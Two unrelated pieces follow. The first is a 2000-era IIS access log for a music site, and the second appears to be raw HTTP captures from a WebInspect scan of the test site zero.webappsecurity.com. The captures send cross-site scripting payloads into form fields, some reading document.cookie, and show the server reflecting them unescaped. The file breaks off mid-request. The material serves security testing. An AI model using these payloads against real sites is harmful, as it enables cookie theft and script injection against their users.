209.53.10.111, -, 1/12/00, 20:44:48, W3SVC6, PRIMUS, 209.153.254.45, 344, 401, 24173, 200, 0, GET, /TheMP3Zone-News.html, -,
209.53.10.111, -, 1/12/00, 20:44:48, W3SVC6, PRIMUS, 209.153.254.45, 656, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
162.74.99.5, -, 1/12/00, 22:12:30, W3SVC6, PRIMUS, 209.153.254.45, 219, 315, 3480, 200, 0, GET, /index.html, -,
162.74.99.5, -, 1/12/00, 22:12:34, W3SVC6, PRIMUS, 209.153.254.45, 1406, 289, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
162.74.99.5, -, 1/12/00, 22:12:34, W3SVC6, PRIMUS, 209.153.254.45, 2063, 297, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 219, 365, 5440, 200, 0, GET, /sections.html, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 188, 315, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 187, 308, 3028, 200, 0, GET, /BennettArts/back.gif, -,
162.74.99.5, -, 1/12/00, 22:12:55, W3SVC6, PRIMUS, 209.153.254.45, 281, 392, 4970, 200, 0, GET, /TheClassicalZone/index.html, -,
162.74.99.5, -, 1/12/00, 22:12:57, W3SVC6, PRIMUS, 209.153.254.45, 1313, 339, 63606, 200, 0, GET, /TheClassicalZone/TheClassicalZone.jpg, -,
195.211.211.40, -, 1/13/00, 8:51:40, W3SVC6, PRIMUS, 209.153.254.45, 0, 419, 623, 404, 3, GET, /videobuyersguide/AdobeAfterEffects4.htm, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 188, 271, 3505, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 562, 325, 73313, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 515, 317, 64537, 200, 0, GET, /TheMP3Zone.jpg, -,
194.83.240.17, -, 1/14/00, 5:33:19, W3SVC6, PRIMUS, 209.153.254.45, 0, 602, 604, 404, 3, GET, /themp3zone/TheRockZone/Yes/lostchapters.htm, -,
24.67.157.183, -, 1/14/00, 10:48:37, W3SVC6, PRIMUS, 209.153.254.45, 469, 351, 24174, 200, 0, GET, /TheMP3Zone-News.html, -,
24.67.157.183, -, 1/14/00, 10:48:37, W3SVC6, PRIMUS, 209.153.254.45, 985, 276, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
128.144.50.129, -, 1/14/00, 13:59:28, W3SVC6, PRIMUS, 209.153.254.45, 719, 363, 24198, 200, 0, GET, /TheMP3Zone-News.html, -,
128.144.50.129, -, 1/14/00, 13:59:28, W3SVC6, PRIMUS, 209.153.254.45, 1047, 332, 64537, 200, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:12:43, W3SVC6, PRIMUS, 209.153.254.45, 406, 319, 3481, 200, 0, GET, /index.html, -,
212.4.196.34, -, 1/15/00, 1:12:48, W3SVC6, PRIMUS, 209.153.254.45, 4657, 332, 73289, 200, 0, GET, /fireworks/firewk-b.gif, -,
212.4.196.35, -, 1/15/00, 1:12:48, W3SVC6, PRIMUS, 209.153.254.45, 1875, 324, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:13:20, W3SVC6, PRIMUS, 209.153.254.45, 453, 369, 5441, 200, 0, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:13:26, W3SVC6, PRIMUS, 209.153.254.45, 6062, 350, 1956, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
212.4.196.34, -, 1/15/00, 1:13:29, W3SVC6, PRIMUS, 209.153.254.45, 2906, 445, 20519, 206, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:13:29, W3SVC6, PRIMUS, 209.153.254.45, 297, 343, 3029, 200, 0, GET, /BennettArts/back.gif, -,
212.4.196.34, -, 1/15/00, 1:14:07, W3SVC6, PRIMUS, 209.153.254.45, 453, 393, 4399, 200, 0, GET, /TheTechnoZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:14:14, W3SVC6, PRIMUS, 209.153.254.45, 7453, 365, 58075, 200, 0, GET, /TheTechnoZone/TheTechnoZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:14:36, W3SVC6, PRIMUS, 209.153.254.45, 172, 323, 5441, 200, 64, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:14:57, W3SVC6, PRIMUS, 209.153.254.45, 469, 391, 4874, 200, 0, GET, /TheJazzZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:02, W3SVC6, PRIMUS, 209.153.254.45, 1438, 359, 46766, 200, 0, GET, /TheJazzZone/TheJazzZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 12437, 391, 4310, 200, 0, GET, /TheRockZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 891, 364, 623, 404, 3, GET, /BennettArts/pics/smallb-icon.GIF, -,
212.4.196.35, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 8625, 357, 623, 404, 3, GET, /BennettArts/pics/back.gif, -,
212.4.196.34, -, 1/15/00, 1:15:13, W3SVC6, PRIMUS, 209.153.254.45, 1578, 359, 52156, 200, 0, GET, /TheRockZone/TheRockZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:15:25, W3SVC6, PRIMUS, 209.153.254.45, 500, 393, 4731, 200, 0, GET, /TheCelticZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:27, W3SVC6, PRIMUS, 209.153.254.45, 2406, 365, 55492, 200, 0, GET, /TheCelticZone/TheCelticZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:15:54, W3SVC6, PRIMUS, 209.153.254.45, 422, 393, 3560, 200, 0, GET, /TheHipHopZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:57, W3SVC6, PRIMUS, 209.153.254.45, 2797, 365, 52070, 200, 0, GET, /TheHipHopZone/TheHipHopZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:16:09, W3SVC6, PRIMUS, 209.153.254.45, 500, 396, 4971, 200, 0, GET, /TheClassicalZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:16:14, W3SVC6, PRIMUS, 209.153.254.45, 5406, 374, 63607, 200, 0, GET, /TheClassicalZone/TheClassicalZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:17:09, W3SVC6, PRIMUS, 209.153.254.45, 406, 394, 4972, 200, 0, GET, /TheAmbientZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:17:16, W3SVC6, PRIMUS, 209.153.254.45, 6437, 368, 57693, 200, 0, GET, /TheAmbientZone/TheAmbientZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:19:48, W3SVC6, PRIMUS, 209.153.254.45, 172, 425, 122, 304, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.35, -, 1/15/00, 1:19:48, W3SVC6, PRIMUS, 209.153.254.45, 172, 343, 3029, 200, 64, GET, /BennettArts/back.gif, -,
212.4.196.35, -, 1/15/00, 1:19:50, W3SVC6, PRIMUS, 209.153.254.45, 484, 392, 3751, 200, 0, GET, /TheHumorZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:19:52, W3SVC6, PRIMUS, 209.153.254.45, 2000, 362, 43243, 200, 0, GET, /TheHumorZone/TheHumorZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:20:02, W3SVC6, PRIMUS, 209.153.254.45, 9656, 401, 3713, 200, 0, GET, /TheJokeZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:20:07, W3SVC6, PRIMUS, 209.153.254.45, 4985, 359, 48404, 200, 0, GET, /TheJokeZone/TheJokeZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:22:22, W3SVC6, PRIMUS, 209.153.254.45, 421, 392, 3870, 200, 0, GET, /TheMovieZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:22:27, W3SVC6, PRIMUS, 209.153.254.45, 5750, 360, 1956, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
212.4.196.34, -, 1/15/00, 1:22:27, W3SVC6, PRIMUS, 209.153.254.45, 1187, 362, 38624, 200, 0, GET, /TheMovieZone/TheMovieZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:22:40, W3SVC6, PRIMUS, 209.153.254.45, 188, 323, 5441, 200, 64, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:22:45, W3SVC6, PRIMUS, 209.153.254.45, 16454, 337, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
GET /join.asp?name=&email=&surname=&house=&street=&address2=--><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /plink.asp?a=b&c=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 216
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /cgi-bin/ikonboard/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:50 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was --><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= --><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=test@<script>alert(document.cookie)</script>.com&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /testing/plink.asp?a=b&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 349
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/plink.asp</font><font face="Arial" size=2>, line 29</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=test@<script>alert(document.cookie)</script>.com&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"'><img%20src="javascript:alert('XSS')">&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = >"'><img src="javascript:alert('XSS')"></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /linking/link1/link2/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:22 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:08 GMT
ETag: "94bbf7fca9dc11:8f6"
Content-Length: 38
<A HREF="./link3/index4.htm">Link3</A>GET /join.asp?name=&email=&surname=>"><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
